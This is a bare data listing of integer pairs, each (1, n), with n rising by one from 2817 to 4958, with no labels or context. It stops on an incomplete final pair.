(1, 2817), (1, 2818), (1, 2819), (1, 2820), (1, 2821), (1, 2822), (1, 2823), (1, 2824), (1, 2825), (1, 2826), (1, 2827), (1, 2828), (1, 2829), (1, 2830), (1, 2831), (1, 2832), (1, 2833), (1, 2834), (1, 2835), (1, 2836), (1, 2837), (1, 2838), (1, 2839), (1, 2840), (1, 2841), (1, 2842), (1, 2843), (1, 2844), (1, 2845), (1, 2846), (1, 2847), (1, 2848), (1, 2849), (1, 2850), (1, 2851), (1, 2852), (1, 2853), (1, 2854), (1, 2855), (1, 2856), (1, 2857), (1, 2858), (1, 2859), (1, 2860), (1, 2861), (1, 2862), (1, 2863), (1, 2864), (1, 2865), (1, 2866), (1, 2867), (1, 2868), (1, 2869), (1, 2870), (1, 2871), (1, 2872), (1, 2873), (1, 2874), (1, 2875), (1, 2876), (1, 2877), (1, 2878), (1, 2879), (1, 2880), (1, 2881), (1, 2882), (1, 2883), (1, 2884), (1, 2885), (1, 2886), (1, 2887), (1, 2888), (1, 2889), (1, 2890), (1, 2891), (1, 2892), (1, 2893), (1, 2894), (1, 2895), (1, 2896), (1, 2897), (1, 2898), (1, 2899), (1, 2900), (1, 2901), (1, 2902), (1, 2903), (1, 2904), (1, 2905), (1, 2906), (1, 2907), (1, 2908), (1, 2909), (1, 2910), (1, 2911), (1, 2912), (1, 2913), (1, 2914), (1, 2915), (1, 2916), (1, 2917), (1, 2918), (1, 2919), (1, 2920), (1, 2921), (1, 2922), (1, 2923), (1, 2924), (1, 2925), (1, 2926), (1, 2927), (1, 2928), (1, 2929), (1, 2930), (1, 2931), (1, 2932), (1, 2933), (1, 2934), (1, 2935), (1, 2936), (1, 2937), (1, 2938), (1, 2939), (1, 2940), (1, 2941), (1, 2942), (1, 2943), (1, 2944), (1, 2945), (1, 2946), (1, 2947), (1, 2948), (1, 2949), (1, 2950), (1, 2951), (1, 2952), (1, 2953), (1, 2954), (1, 2955), (1, 2956), (1, 2957), (1, 2958), (1, 2959), (1, 2960), (1, 2961), (1, 2962), (1, 2963), (1, 2964), (1, 2965), (1, 2966), (1, 2967), (1, 2968), (1, 2969), (1, 2970), (1, 2971), (1, 2972), (1, 2973), (1, 2974), (1, 2975), (1, 2976), (1, 2977), (1, 2978), (1, 2979), (1, 2980), (1, 2981), (1, 2982), (1, 2983), (1, 2984), (1, 2985), (1, 2986), (1, 2987), (1, 2988), (1, 2989), (1, 2990), (1, 2991), (1, 2992), (1, 2993), (1, 2994), (1, 2995), (1, 2996), (1, 2997), (1, 2998), (1, 2999), (1, 3000), (1, 3001), (1, 3002), (1, 3003), (1, 3004), (1, 3005), (1, 3006), (1, 3007), (1, 3008), (1, 3009), (1, 3010), (1, 3011), (1, 3012), (1, 3013), (1, 3014), (1, 3015), (1, 3016), (1, 3017), (1, 3018), (1, 3019), (1, 3020), (1, 3021), (1, 3022), (1, 3023), (1, 3024), (1, 3025), (1, 3026), (1, 3027), (1, 3028), (1, 3029), (1, 3030), (1, 3031), (1, 3032), (1, 3033), (1, 3034), (1, 3035), (1, 3036), (1, 3037), (1, 3038), (1, 3039), (1, 3040), (1, 3041), (1, 3042), (1, 3043), (1, 3044), (1, 3045), (1, 3046), (1, 3047), (1, 3048), (1, 3049), (1, 3050), (1, 3051), (1, 3052), (1, 3053), (1, 3054), (1, 3055), (1, 3056), (1, 3057), (1, 3058), (1, 3059), (1, 3060), (1, 3061), (1, 3062), (1, 3063), (1, 3064), (1, 3065), (1, 3066), (1, 3067), (1, 3068), (1, 3069), (1, 3070), (1, 3071), (1, 3072), (1, 3073), (1, 3074), (1, 3075), (1, 3076), (1, 3077), (1, 3078), (1, 3079), (1, 3080), (1, 3081), (1, 3082), (1, 3083), (1, 3084), (1, 3085), (1, 3086), (1, 3087), (1, 3088), (1, 3089), (1, 3090), (1, 3091), (1, 3092), (1, 3093), (1, 3094), (1, 3095), (1, 3096), (1, 3097), (1, 3098), (1, 3099), (1, 3100), (1, 3101), (1, 3102), (1, 3103), (1, 3104), (1, 3105), (1, 3106), (1, 3107), (1, 3108), (1, 3109), (1, 3110), (1, 3111), (1, 3112), (1, 3113), (1, 3114), (1, 3115), (1, 3116), (1, 3117), (1, 3118), (1, 3119), (1, 3120), (1, 3121), (1, 3122), (1, 3123), (1, 3124), (1, 3125), (1, 3126), (1, 3127), (1, 3128), (1, 3129), (1, 3130), (1, 3131), (1, 3132), (1, 3133), (1, 3134), (1, 3135), (1, 3136), (1, 3137), (1, 3138), (1, 3139), (1, 3140), (1, 3141), (1, 3142), (1, 3143), (1, 3144), (1, 3145), (1, 3146), (1, 3147), (1, 3148), (1, 3149), (1, 3150), (1, 3151), (1, 3152), (1, 3153), (1, 3154), (1, 3155), (1, 3156), (1, 3157), (1, 3158), (1, 3159), (1, 3160), (1, 3161), (1, 3162), (1, 3163), (1, 3164), (1, 3165), (1, 3166), (1, 3167), (1, 3168), (1, 3169), (1, 3170), (1, 3171), (1, 3172), (1, 3173), (1, 3174), (1, 3175), (1, 3176), (1, 3177), (1, 3178), (1, 3179), (1, 3180), (1, 3181), (1, 3182), (1, 3183), (1, 3184), (1, 3185), (1, 3186), (1, 3187), (1, 3188), (1, 3189), (1, 3190), (1, 3191), (1, 3192), (1, 3193), (1, 3194), (1, 3195), (1, 3196), (1, 3197), (1, 3198), (1, 3199), (1, 3200), (1, 3201), (1, 3202), (1, 3203), (1, 3204), (1, 3205), (1, 3206), (1, 3207), (1, 3208), (1, 3209), (1, 3210), (1, 3211), (1, 3212), (1, 3213), (1, 3214), (1, 3215), (1, 3216), (1, 3217), (1, 3218), (1, 3219), (1, 3220), (1, 3221), (1, 3222), (1, 3223), (1, 3224), (1, 3225), (1, 3226), (1, 3227), (1, 3228), (1, 3229), (1, 3230), (1, 3231), (1, 3232), (1, 3233), (1, 3234), (1, 3235), (1, 3236), (1, 3237), (1, 3238), (1, 3239), (1, 3240), (1, 3241), (1, 3242), (1, 3243), (1, 3244), (1, 3245), (1, 3246), (1, 3247), (1, 3248), (1, 3249), (1, 3250), (1, 3251), (1, 3252), (1, 3253), (1, 3254), (1, 3255), (1, 3256), (1, 3257), (1, 3258), (1, 3259), (1, 3260), (1, 3261), (1, 3262), (1, 3263), (1, 3264), (1, 3265), (1, 3266), (1, 3267), (1, 3268), (1, 3269), (1, 3270), (1, 3271), (1, 3272), (1, 3273), (1, 3274), (1, 3275), (1, 3276), (1, 3277), (1, 3278), (1, 3279), (1, 3280), (1, 3281), (1, 3282), (1, 3283), (1, 3284), (1, 3285), (1, 3286), (1, 3287), (1, 3288), (1, 3289), (1, 3290), (1, 3291), (1, 3292), (1, 3293), (1, 3294), (1, 3295), (1, 3296), (1, 3297), (1, 3298), (1, 3299), (1, 3300), (1, 3301), (1, 3302), (1, 3303), (1, 3304), (1, 3305), (1, 3306), (1, 3307), (1, 3308), (1, 3309), (1, 3310), (1, 3311), (1, 3312), (1, 3313), (1, 3314), (1, 3315), (1, 3316), (1, 3317), (1, 3318), (1, 3319), (1, 3320), (1, 3321), (1, 3322), (1, 3323), (1, 3324), (1, 3325), (1, 3326), (1, 3327), (1, 3328), (1, 3329), (1, 3330), (1, 3331), (1, 3332), (1, 3333), (1, 3334), (1, 3335), (1, 3336), (1, 3337), (1, 3338), (1, 3339), (1, 3340), (1, 3341), (1, 3342), (1, 3343), (1, 3344), (1, 3345), (1, 3346), (1, 3347), (1, 3348), (1, 3349), (1, 3350), (1, 3351), (1, 3352), (1, 3353), (1, 3354), (1, 3355), (1, 3356), (1, 3357), (1, 3358), (1, 3359), (1, 3360), (1, 3361), (1, 3362), (1, 3363), (1, 3364), (1, 3365), (1, 3366), (1, 3367), (1, 3368), (1, 3369), (1, 3370), (1, 3371), (1, 3372), (1, 3373), (1, 3374), (1, 3375), (1, 3376), (1, 3377), (1, 3378), (1, 3379), (1, 3380), (1, 3381), (1, 3382), (1, 3383), (1, 3384), (1, 3385), (1, 3386), (1, 3387), (1, 3388), (1, 3389), (1, 3390), (1, 3391), (1, 3392), (1, 3393), (1, 3394), (1, 3395), (1, 3396), (1, 3397), (1, 3398), (1, 3399), (1, 3400), (1, 3401), (1, 3402), (1, 3403), (1, 3404), (1, 3405), (1, 3406), (1, 3407), (1, 3408), (1, 3409), (1, 3410), (1, 3411), (1, 3412), (1, 3413), (1, 3414), (1, 3415), (1, 3416), (1, 3417), (1, 3418), (1, 3419), (1, 3420), (1, 3421), (1, 3422), (1, 3423), (1, 3424), (1, 3425), (1, 3426), (1, 3427), (1, 3428), (1, 3429), (1, 3430), (1, 3431), (1, 3432), (1, 3433), (1, 3434), (1, 3435), (1, 3436), (1, 3437), (1, 3438), (1, 3439), (1, 3440), (1, 3441), (1, 3442), (1, 3443), (1, 3444), (1, 3445), (1, 3446), (1, 3447), (1, 3448), (1, 3449), (1, 3450), (1, 3451), (1, 3452), (1, 3453), (1, 3454), (1, 3455), (1, 3456), (1, 3457), (1, 3458), (1, 3459), (1, 3460), (1, 3461), (1, 3462), (1, 3463), (1, 3464), (1, 3465), (1, 3466), (1, 3467), (1, 3468), (1, 3469), (1, 3470), (1, 3471), (1, 3472), (1, 3473), (1, 3474), (1, 3475), (1, 3476), (1, 3477), (1, 3478), (1, 3479), (1, 3480), (1, 3481), (1, 3482), (1, 3483), (1, 3484), (1, 3485), (1, 3486), (1, 3487), (1, 3488), (1, 3489), (1, 3490), (1, 3491), (1, 3492), (1, 3493), (1, 3494), (1, 3495), (1, 3496), (1, 3497), (1, 3498), (1, 3499), (1, 3500), (1, 3501), (1, 3502), (1, 3503), (1, 3504), (1, 3505), (1, 3506), (1, 3507), (1, 3508), (1, 3509), (1, 3510), (1, 3511), (1, 3512), (1, 3513), (1, 3514), (1, 3515), (1, 3516), (1, 3517), (1, 3518), (1, 3519), (1, 3520), (1, 3521), (1, 3522), (1, 3523), (1, 3524), (1, 3525), (1, 3526), (1, 3527), (1, 3528), (1, 3529), (1, 3530), (1, 3531), (1, 3532), (1, 3533), (1, 3534), (1, 3535), (1, 3536), (1, 3537), (1, 3538), (1, 3539), (1, 3540), (1, 3541), (1, 3542), (1, 3543), (1, 3544), (1, 3545), (1, 3546), (1, 3547), (1, 3548), (1, 3549), (1, 3550), (1, 3551), (1, 3552), (1, 3553), (1, 3554), (1, 3555), (1, 3556), (1, 3557), (1, 3558), (1, 3559), (1, 3560), (1, 3561), (1, 3562), (1, 3563), (1, 3564), (1, 3565), (1, 3566), (1, 3567), (1, 3568), (1, 3569), (1, 3570), (1, 3571), (1, 3572), (1, 3573), (1, 3574), (1, 3575), (1, 3576), (1, 3577), (1, 3578), (1, 3579), (1, 3580), (1, 3581), (1, 3582), (1, 3583), (1, 3584), (1, 3585), (1, 3586), (1, 3587), (1, 3588), (1, 3589), (1, 3590), (1, 3591), (1, 3592), (1, 3593), (1, 3594), (1, 3595), (1, 3596), (1, 3597), (1, 3598), (1, 3599), (1, 3600), (1, 3601), (1, 3602), (1, 3603), (1, 3604), (1, 3605), (1, 3606), (1, 3607), (1, 3608), (1, 3609), (1, 3610), (1, 3611), (1, 3612), (1, 3613), (1, 3614), (1, 3615), (1, 3616), (1, 3617), (1, 3618), (1, 3619), (1, 3620), (1, 3621), (1, 3622), (1, 3623), (1, 3624), (1, 3625), (1, 3626), (1, 3627), (1, 3628), (1, 3629), (1, 3630), (1, 3631), (1, 3632), (1, 3633), (1, 3634), (1, 3635), (1, 3636), (1, 3637), (1, 3638), (1, 3639), (1, 3640), (1, 3641), (1, 3642), (1, 3643), (1, 3644), (1, 3645), (1, 3646), (1, 3647), (1, 3648), (1, 3649), (1, 3650), (1, 3651), (1, 3652), (1, 3653), (1, 3654), (1, 3655), (1, 3656), (1, 3657), (1, 3658), (1, 3659), (1, 3660), (1, 3661), (1, 3662), (1, 3663), (1, 3664), (1, 3665), (1, 3666), (1, 3667), (1, 3668), (1, 3669), (1, 3670), (1, 3671), (1, 3672), (1, 3673), (1, 3674), (1, 3675), (1, 3676), (1, 3677), (1, 3678), (1, 3679), (1, 3680), (1, 3681), (1, 3682), (1, 3683), (1, 3684), (1, 3685), (1, 3686), (1, 3687), (1, 3688), (1, 3689), (1, 3690), (1, 3691), (1, 3692), (1, 3693), (1, 3694), (1, 3695), (1, 3696), (1, 3697), (1, 3698), (1, 3699), (1, 3700), (1, 3701), (1, 3702), (1, 3703), (1, 3704), (1, 3705), (1, 3706), (1, 3707), (1, 3708), (1, 3709), (1, 3710), (1, 3711), (1, 3712), (1, 3713), (1, 3714), (1, 3715), (1, 3716), (1, 3717), (1, 3718), (1, 3719), (1, 3720), (1, 3721), (1, 3722), (1, 3723), (1, 3724), (1, 3725), (1, 3726), (1, 3727), (1, 3728), (1, 3729), (1, 3730), (1, 3731), (1, 3732), (1, 3733), (1, 3734), (1, 3735), (1, 3736), (1, 3737), (1, 3738), (1, 3739), (1, 3740), (1, 3741), (1, 3742), (1, 3743), (1, 3744), (1, 3745), (1, 3746), (1, 3747), (1, 3748), (1, 3749), (1, 3750), (1, 3751), (1, 3752), (1, 3753), (1, 3754), (1, 3755), (1, 3756), (1, 3757), (1, 3758), (1, 3759), (1, 3760), (1, 3761), (1, 3762), (1, 3763), (1, 3764), (1, 3765), (1, 3766), (1, 3767), (1, 3768), (1, 3769), (1, 3770), (1, 3771), (1, 3772), (1, 3773), (1, 3774), (1, 3775), (1, 3776), (1, 3777), (1, 3778), (1, 3779), (1, 3780), (1, 3781), (1, 3782), (1, 3783), (1, 3784), (1, 3785), (1, 3786), (1, 3787), (1, 3788), (1, 3789), (1, 3790), (1, 3791), (1, 3792), (1, 3793), (1, 3794), (1, 3795), (1, 3796), (1, 3797), (1, 3798), (1, 3799), (1, 3800), (1, 3801), (1, 3802), (1, 3803), (1, 3804), (1, 3805), (1, 3806), (1, 3807), (1, 3808), (1, 3809), (1, 3810), (1, 3811), (1, 3812), (1, 3813), (1, 3814), (1, 3815), (1, 3816), (1, 3817), (1, 3818), (1, 3819), (1, 3820), (1, 3821), (1, 3822), (1, 3823), (1, 3824), (1, 3825), (1, 3826), (1, 3827), (1, 3828), (1, 3829), (1, 3830), (1, 3831), (1, 3832), (1, 3833), (1, 3834), (1, 3835), (1, 3836), (1, 3837), (1, 3838), (1, 3839), (1, 3840), (1, 3841), (1, 3842), (1, 3843), (1, 3844), (1, 3845), (1, 3846), (1, 3847), (1, 3848), (1, 3849), (1, 3850), (1, 3851), (1, 3852), (1, 3853), (1, 3854), (1, 3855), (1, 3856), (1, 3857), (1, 3858), (1, 3859), (1, 3860), (1, 3861), (1, 3862), (1, 3863), (1, 3864), (1, 3865), (1, 3866), (1, 3867), (1, 3868), (1, 3869), (1, 3870), (1, 3871), (1, 3872), (1, 3873), (1, 3874), (1, 3875), (1, 3876), (1, 3877), (1, 3878), (1, 3879), (1, 3880), (1, 3881), (1, 3882), (1, 3883), (1, 3884), (1, 3885), (1, 3886), (1, 3887), (1, 3888), (1, 3889), (1, 3890), (1, 3891), (1, 3892), (1, 3893), (1, 3894), (1, 3895), (1, 3896), (1, 3897), (1, 3898), (1, 3899), (1, 3900), (1, 3901), (1, 3902), (1, 3903), (1, 3904), (1, 3905), (1, 3906), (1, 3907), (1, 3908), (1, 3909), (1, 3910), (1, 3911), (1, 3912), (1, 3913), (1, 3914), (1, 3915), (1, 3916), (1, 3917), (1, 3918), (1, 3919), (1, 3920), (1, 3921), (1, 3922), (1, 3923), (1, 3924), (1, 3925), (1, 3926), (1, 3927), (1, 3928), (1, 3929), (1, 3930), (1, 3931), (1, 3932), (1, 3933), (1, 3934), (1, 3935), (1, 3936), (1, 3937), (1, 3938), (1, 3939), (1, 3940), (1, 3941), (1, 3942), (1, 3943), (1, 3944), (1, 3945), (1, 3946), (1, 3947), (1, 3948), (1, 3949), (1, 3950), (1, 3951), (1, 3952), (1, 3953), (1, 3954), (1, 3955), (1, 3956), (1, 3957), (1, 3958), (1, 3959), (1, 3960), (1, 3961), (1, 3962), (1, 3963), (1, 3964), (1, 3965), (1, 3966), (1, 3967), (1, 3968), (1, 3969), (1, 3970), (1, 3971), (1, 3972), (1, 3973), (1, 3974), (1, 3975), (1, 3976), (1, 3977), (1, 3978), (1, 3979), (1, 3980), (1, 3981), (1, 3982), (1, 3983), (1, 3984), (1, 3985), (1, 3986), (1, 3987), (1, 3988), (1, 3989), (1, 3990), (1, 3991), (1, 3992), (1, 3993), (1, 3994), (1, 3995), (1, 3996), (1, 3997), (1, 3998), (1, 3999), (1, 4000), (1, 4001), (1, 4002), (1, 4003), (1, 4004), (1, 4005), (1, 4006), (1, 4007), (1, 4008), (1, 4009), (1, 4010), (1, 4011), (1, 4012), (1, 4013), (1, 4014), (1, 4015), (1, 4016), (1, 4017), (1, 4018), (1, 4019), (1, 4020), (1, 4021), (1, 4022), (1, 4023), (1, 4024), (1, 4025), (1, 4026), (1, 4027), (1, 4028), (1, 4029), (1, 4030), (1, 4031), (1, 4032), (1, 4033), (1, 4034), (1, 4035), (1, 4036), (1, 4037), (1, 4038), (1, 4039), (1, 4040), (1, 4041), (1, 4042), (1, 4043), (1, 4044), (1, 4045), (1, 4046), (1, 4047), (1, 4048), (1, 4049), (1, 4050), (1, 4051), (1, 4052), (1, 4053), (1, 4054), (1, 4055), (1, 4056), (1, 4057), (1, 4058), (1, 4059), (1, 4060), (1, 4061), (1, 4062), (1, 4063), (1, 4064), (1, 4065), (1, 4066), (1, 4067), (1, 4068), (1, 4069), (1, 4070), (1, 4071), (1, 4072), (1, 4073), (1, 4074), (1, 4075), (1, 4076), (1, 4077), (1, 4078), (1, 4079), (1, 4080), (1, 4081), (1, 4082), (1, 4083), (1, 4084), (1, 4085), (1, 4086), (1, 4087), (1, 4088), (1, 4089), (1, 4090), (1, 4091), (1, 4092), (1, 4093), (1, 4094), (1, 4095), (1, 4096), (1, 4097), (1, 4098), (1, 4099), (1, 4100), (1, 4101), (1, 4102), (1, 4103), (1, 4104), (1, 4105), (1, 4106), (1, 4107), (1, 4108), (1, 4109), (1, 4110), (1, 4111), (1, 4112), (1, 4113), (1, 4114), (1, 4115), (1, 4116), (1, 4117), (1, 4118), (1, 4119), (1, 4120), (1, 4121), (1, 4122), (1, 4123), (1, 4124), (1, 4125), (1, 4126), (1, 4127), (1, 4128), (1, 4129), (1, 4130), (1, 4131), (1, 4132), (1, 4133), (1, 4134), (1, 4135), (1, 4136), (1, 4137), (1, 4138), (1, 4139), (1, 4140), (1, 4141), (1, 4142), (1, 4143), (1, 4144), (1, 4145), (1, 4146), (1, 4147), (1, 4148), (1, 4149), (1, 4150), (1, 4151), (1, 4152), (1, 4153), (1, 4154), (1, 4155), (1, 4156), (1, 4157), (1, 4158), (1, 4159), (1, 4160), (1, 4161), (1, 4162), (1, 4163), (1, 4164), (1, 4165), (1, 4166), (1, 4167), (1, 4168), (1, 4169), (1, 4170), (1, 4171), (1, 4172), (1, 4173), (1, 4174), (1, 4175), (1, 4176), (1, 4177), (1, 4178), (1, 4179), (1, 4180), (1, 4181), (1, 4182), (1, 4183), (1, 4184), (1, 4185), (1, 4186), (1, 4187), (1, 4188), (1, 4189), (1, 4190), (1, 4191), (1, 4192), (1, 4193), (1, 4194), (1, 4195), (1, 4196), (1, 4197), (1, 4198), (1, 4199), (1, 4200), (1, 4201), (1, 4202), (1, 4203), (1, 4204), (1, 4205), (1, 4206), (1, 4207), (1, 4208), (1, 4209), (1, 4210), (1, 4211), (1, 4212), (1, 4213), (1, 4214), (1, 4215), (1, 4216), (1, 4217), (1, 4218), (1, 4219), (1, 4220), (1, 4221), (1, 4222), (1, 4223), (1, 4224), (1, 4225), (1, 4226), (1, 4227), (1, 4228), (1, 4229), (1, 4230), (1, 4231), (1, 4232), (1, 4233), (1, 4234), (1, 4235), (1, 4236), (1, 4237), (1, 4238), (1, 4239), (1, 4240), (1, 4241), (1, 4242), (1, 4243), (1, 4244), (1, 4245), (1, 4246), (1, 4247), (1, 4248), (1, 4249), (1, 4250), (1, 4251), (1, 4252), (1, 4253), (1, 4254), (1, 4255), (1, 4256), (1, 4257), (1, 4258), (1, 4259), (1, 4260), (1, 4261), (1, 4262), (1, 4263), (1, 4264), (1, 4265), (1, 4266), (1, 4267), (1, 4268), (1, 4269), (1, 4270), (1, 4271), (1, 4272), (1, 4273), (1, 4274), (1, 4275), (1, 4276), (1, 4277), (1, 4278), (1, 4279), (1, 4280), (1, 4281), (1, 4282), (1, 4283), (1, 4284), (1, 4285), (1, 4286), (1, 4287), (1, 4288), (1, 4289), (1, 4290), (1, 4291), (1, 4292), (1, 4293), (1, 4294), (1, 4295), (1, 4296), (1, 4297), (1, 4298), (1, 4299), (1, 4300), (1, 4301), (1, 4302), (1, 4303), (1, 4304), (1, 4305), (1, 4306), (1, 4307), (1, 4308), (1, 4309), (1, 4310), (1, 4311), (1, 4312), (1, 4313), (1, 4314), (1, 4315), (1, 4316), (1, 4317), (1, 4318), (1, 4319), (1, 4320), (1, 4321), (1, 4322), (1, 4323), (1, 4324), (1, 4325), (1, 4326), (1, 4327), (1, 4328), (1, 4329), (1, 4330), (1, 4331), (1, 4332), (1, 4333), (1, 4334), (1, 4335), (1, 4336), (1, 4337), (1, 4338), (1, 4339), (1, 4340), (1, 4341), (1, 4342), (1, 4343), (1, 4344), (1, 4345), (1, 4346), (1, 4347), (1, 4348), (1, 4349), (1, 4350), (1, 4351), (1, 4352), (1, 4353), (1, 4354), (1, 4355), (1, 4356), (1, 4357), (1, 4358), (1, 4359), (1, 4360), (1, 4361), (1, 4362), (1, 4363), (1, 4364), (1, 4365), (1, 4366), (1, 4367), (1, 4368), (1, 4369), (1, 4370), (1, 4371), (1, 4372), (1, 4373), (1, 4374), (1, 4375), (1, 4376), (1, 4377), (1, 4378), (1, 4379), (1, 4380), (1, 4381), (1, 4382), (1, 4383), (1, 4384), (1, 4385), (1, 4386), (1, 4387), (1, 4388), (1, 4389), (1, 4390), (1, 4391), (1, 4392), (1, 4393), (1, 4394), (1, 4395), (1, 4396), (1, 4397), (1, 4398), (1, 4399), (1, 4400), (1, 4401), (1, 4402), (1, 4403), (1, 4404), (1, 4405), (1, 4406), (1, 4407), (1, 4408), (1, 4409), (1, 4410), (1, 4411), (1, 4412), (1, 4413), (1, 4414), (1, 4415), (1, 4416), (1, 4417), (1, 4418), (1, 4419), (1, 4420), (1, 4421), (1, 4422), (1, 4423), (1, 4424), (1, 4425), (1, 4426), (1, 4427), (1, 4428), (1, 4429), (1, 4430), (1, 4431), (1, 4432), (1, 4433), (1, 4434), (1, 4435), (1, 4436), (1, 4437), (1, 4438), (1, 4439), (1, 4440), (1, 4441), (1, 4442), (1, 4443), (1, 4444), (1, 4445), (1, 4446), (1, 4447), (1, 4448), (1, 4449), (1, 4450), (1, 4451), (1, 4452), (1, 4453), (1, 4454), (1, 4455), (1, 4456), (1, 4457), (1, 4458), (1, 4459), (1, 4460), (1, 4461), (1, 4462), (1, 4463), (1, 4464), (1, 4465), (1, 4466), (1, 4467), (1, 4468), (1, 4469), (1, 4470), (1, 4471), (1, 4472), (1, 4473), (1, 4474), (1, 4475), (1, 4476), (1, 4477), (1, 4478), (1, 4479), (1, 4480), (1, 4481), (1, 4482), (1, 4483), (1, 4484), (1, 4485), (1, 4486), (1, 4487), (1, 4488), (1, 4489), (1, 4490), (1, 4491), (1, 4492), (1, 4493), (1, 4494), (1, 4495), (1, 4496), (1, 4497), (1, 4498), (1, 4499), (1, 4500), (1, 4501), (1, 4502), (1, 4503), (1, 4504), (1, 4505), (1, 4506), (1, 4507), (1, 4508), (1, 4509), (1, 4510), (1, 4511), (1, 4512), (1, 4513), (1, 4514), (1, 4515), (1, 4516), (1, 4517), (1, 4518), (1, 4519), (1, 4520), (1, 4521), (1, 4522), (1, 4523), (1, 4524), (1, 4525), (1, 4526), (1, 4527), (1, 4528), (1, 4529), (1, 4530), (1, 4531), (1, 4532), (1, 4533), (1, 4534), (1, 4535), (1, 4536), (1, 4537), (1, 4538), (1, 4539), (1, 4540), (1, 4541), (1, 4542), (1, 4543), (1, 4544), (1, 4545), (1, 4546), (1, 4547), (1, 4548), (1, 4549), (1, 4550), (1, 4551), (1, 4552), (1, 4553), (1, 4554), (1, 4555), (1, 4556), (1, 4557), (1, 4558), (1, 4559), (1, 4560), (1, 4561), (1, 4562), (1, 4563), (1, 4564), (1, 4565), (1, 4566), (1, 4567), (1, 4568), (1, 4569), (1, 4570), (1, 4571), (1, 4572), (1, 4573), (1, 4574), (1, 4575), (1, 4576), (1, 4577), (1, 4578), (1, 4579), (1, 4580), (1, 4581), (1, 4582), (1, 4583), (1, 4584), (1, 4585), (1, 4586), (1, 4587), (1, 4588), (1, 4589), (1, 4590), (1, 4591), (1, 4592), (1, 4593), (1, 4594), (1, 4595), (1, 4596), (1, 4597), (1, 4598), (1, 4599), (1, 4600), (1, 4601), (1, 4602), (1, 4603), (1, 4604), (1, 4605), (1, 4606), (1, 4607), (1, 4608), (1, 4609), (1, 4610), (1, 4611), (1, 4612), (1, 4613), (1, 4614), (1, 4615), (1, 4616), (1, 4617), (1, 4618), (1, 4619), (1, 4620), (1, 4621), (1, 4622), (1, 4623), (1, 4624), (1, 4625), (1, 4626), (1, 4627), (1, 4628), (1, 4629), (1, 4630), (1, 4631), (1, 4632), (1, 4633), (1, 4634), (1, 4635), (1, 4636), (1, 4637), (1, 4638), (1, 4639), (1, 4640), (1, 4641), (1, 4642), (1, 4643), (1, 4644), (1, 4645), (1, 4646), (1, 4647), (1, 4648), (1, 4649), (1, 4650), (1, 4651), (1, 4652), (1, 4653), (1, 4654), (1, 4655), (1, 4656), (1, 4657), (1, 4658), (1, 4659), (1, 4660), (1, 4661), (1, 4662), (1, 4663), (1, 4664), (1, 4665), (1, 4666), (1, 4667), (1, 4668), (1, 4669), (1, 4670), (1, 4671), (1, 4672), (1, 4673), (1, 4674), (1, 4675), (1, 4676), (1, 4677), (1, 4678), (1, 4679), (1, 4680), (1, 4681), (1, 4682), (1, 4683), (1, 4684), (1, 4685), (1, 4686), (1, 4687), (1, 4688), (1, 4689), (1, 4690), (1, 4691), (1, 4692), (1, 4693), (1, 4694), (1, 4695), (1, 4696), (1, 4697), (1, 4698), (1, 4699), (1, 4700), (1, 4701), (1, 4702), (1, 4703), (1, 4704), (1, 4705), (1, 4706), (1, 4707), (1, 4708), (1, 4709), (1, 4710), (1, 4711), (1, 4712), (1, 4713), (1, 4714), (1, 4715), (1, 4716), (1, 4717), (1, 4718), (1, 4719), (1, 4720), (1, 4721), (1, 4722), (1, 4723), (1, 4724), (1, 4725), (1, 4726), (1, 4727), (1, 4728), (1, 4729), (1, 4730), (1, 4731), (1, 4732), (1, 4733), (1, 4734), (1, 4735), (1, 4736), (1, 4737), (1, 4738), (1, 4739), (1, 4740), (1, 4741), (1, 4742), (1, 4743), (1, 4744), (1, 4745), (1, 4746), (1, 4747), (1, 4748), (1, 4749), (1, 4750), (1, 4751), (1, 4752), (1, 4753), (1, 4754), (1, 4755), (1, 4756), (1, 4757), (1, 4758), (1, 4759), (1, 4760), (1, 4761), (1, 4762), (1, 4763), (1, 4764), (1, 4765), (1, 4766), (1, 4767), (1, 4768), (1, 4769), (1, 4770), (1, 4771), (1, 4772), (1, 4773), (1, 4774), (1, 4775), (1, 4776), (1, 4777), (1, 4778), (1, 4779), (1, 4780), (1, 4781), (1, 4782), (1, 4783), (1, 4784), (1, 4785), (1, 4786), (1, 4787), (1, 4788), (1, 4789), (1, 4790), (1, 4791), (1, 4792), (1, 4793), (1, 4794), (1, 4795), (1, 4796), (1, 4797), (1, 4798), (1, 4799), (1, 4800), (1, 4801), (1, 4802), (1, 4803), (1, 4804), (1, 4805), (1, 4806), (1, 4807), (1, 4808), (1, 4809), (1, 4810), (1, 4811), (1, 4812), (1, 4813), (1, 4814), (1, 4815), (1, 4816), (1, 4817), (1, 4818), (1, 4819), (1, 4820), (1, 4821), (1, 4822), (1, 4823), (1, 4824), (1, 4825), (1, 4826), (1, 4827), (1, 4828), (1, 4829), (1, 4830), (1, 4831), (1, 4832), (1, 4833), (1, 4834), (1, 4835), (1, 4836), (1, 4837), (1, 4838), (1, 4839), (1, 4840), (1, 4841), (1, 4842), (1, 4843), (1, 4844), (1, 4845), (1, 4846), (1, 4847), (1, 4848), (1, 4849), (1, 4850), (1, 4851), (1, 4852), (1, 4853), (1, 4854), (1, 4855), (1, 4856), (1, 4857), (1, 4858), (1, 4859), (1, 4860), (1, 4861), (1, 4862), (1, 4863), (1, 4864), (1, 4865), (1, 4866), (1, 4867), (1, 4868), (1, 4869), (1, 4870), (1, 4871), (1, 4872), (1, 4873), (1, 4874), (1, 4875), (1, 4876), (1, 4877), (1, 4878), (1, 4879), (1, 4880), (1, 4881), (1, 4882), (1, 4883), (1, 4884), (1, 4885), (1, 4886), (1, 4887), (1, 4888), (1, 4889), (1, 4890), (1, 4891), (1, 4892), (1, 4893), (1, 4894), (1, 4895), (1, 4896), (1, 4897), (1, 4898), (1, 4899), (1, 4900), (1, 4901), (1, 4902), (1, 4903), (1, 4904), (1, 4905), (1, 4906), (1, 4907), (1, 4908), (1, 4909), (1, 4910), (1, 4911), (1, 4912), (1, 4913), (1, 4914), (1, 4915), (1, 4916), (1, 4917), (1, 4918), (1, 4919), (1, 4920), (1, 4921), (1, 4922), (1, 4923), (1, 4924), (1, 4925), (1, 4926), (1, 4927), (1, 4928), (1, 4929), (1, 4930), (1, 4931), (1, 4932), (1, 4933), (1, 4934), (1, 4935), (1, 4936), (1, 4937), (1, 4938), (1, 4939), (1, 4940), (1, 4941), (1, 4942), (1, 4943), (1, 4944), (1, 4945), (1, 4946), (1, 4947), (1, 4948), (1, 4949), (1, 4950), (1, 4951), (1, 4952), (1, 4953), (1, 4954), (1, 4955), (1, 4956), (1, 4957), (1, 4958), (1, 